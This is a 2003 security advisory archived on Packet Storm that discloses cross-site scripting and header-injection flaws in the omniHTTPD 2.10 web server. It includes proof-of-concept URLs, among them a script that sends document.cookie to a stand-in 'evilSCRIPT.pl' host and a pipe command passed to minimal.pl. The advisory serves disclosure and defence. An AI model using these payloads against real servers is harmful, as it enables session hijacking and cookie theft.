what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

omniHTTPD2.10xss.txt

omniHTTPD2.10xss.txt
Posted Jul 18, 2003
Authored by Dr. Insane | Site members.lycos.co.uk

omniHTTPD 2.10 suffers from cross site scripting vulnerabilities that could lead to session hijacking.

tags | advisory, vulnerability, xss
SHA-256 | 52b5848c269b6da5f3724ecbe6e5ea940b8b8a3fbcfd5bff25bae930f4ebc792

omniHTTPD2.10xss.txt

Change Mirror Download
omniHTTPD 2.10 cross-site scripting

Release Date:
17.07.2003

Severity:
Medium (Session hijacking/possible compromise)


Platforms Affected:

omniHTTPD 2.10
Windows 2000 Any version
Windows NT Any version
Windows XP
Windows 9x
Windows Me


Description:

OmniHTTPd is a powerful all-purpose industry compliant web server built specifically for the Windows 95/98/NT4 platform. In addition to Standard CGI support, the server sports advanced features such as Keep-Alive connections, table auto-indexing and server-side includes. For maximum performance, OmniHTTPd is both 32-bit and multi-threaded. Many users agree that OmniHTTPd is the fastest and most compact web server available for the Windows platform.

A remote attacker could embed malicious script within a URL to one of the services, which would be executed in the victim's Web browser once the URL is clicked


Technical Description/Exploit:

This vulnerability could enable an attacker to hijack web sessions, allowing a range of potential compromises on the targeted host.
The Location header sent by the server contains the URL initially requested, but with %xx decoded to ASCII values. Embedding %0D, %0A, and %20 codes into the URL is allowed, meaning HTTP headers can be added.The vulnerability occurs because omniHTTPD doesn't filter maliciously malformed headers containing HTML markup before passing them onto the browser as entity data.

The following URLs will demonstrate the attack:

(1)

<script>window.location="/cgi-bin/minimal.pl?|<dir>%00";</script>

In our example we will play with the above command using the file:
/cgi-win/test-win.exe

The url will be something like this:
/cgi-win/test-win.exe?<script>window.location="/cgi-bin/minimal.pl?|<dir>%00";</script>
This will call the file minimal.pl in cgi-bin....

(2)
http://[target]/cgi-bin/minimal.pl?<img src="http://www.hack.gr/images/gears.jpg" onerror="alert(document.cookie)">

(3)
<script> window.open('http://host/cgi-bin/evilSCRIPT.pl?'+document.referrer +'%20'+document.cookie);</script>

(4)
http://[target]/cgi-win/test-win.exe?<script>alert("p0wned!")</script>

Cross-site scripting vulnerabilities are often assumed to be small, useless exposures that aren't worth much attention. This is a false assumption -- depending on the applications installed, a successful privilege escalation via XSS can result in complete compromise of a web server, or other sensitive systems.


Vendor Status:
Vendor informed but I got no response yet

Patch:
At the moment remove all the sample file.

Credit:
dr_insane

Disclaimer:
The author(s) does(do) not have any responsibility for any malicious
use of this advisory or proof of concept code. The code and the
information provided here are for educational purposes only.
The author(s) will NOT be held responsible for any direct or
indirect damages caused by the information or the code
provided here.


dr_insane
dr_insane@pathfinder.gr
http://members.lycos.co.uk/r34ct/

Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    37 Files
  • 27
    Feb 27th
    34 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close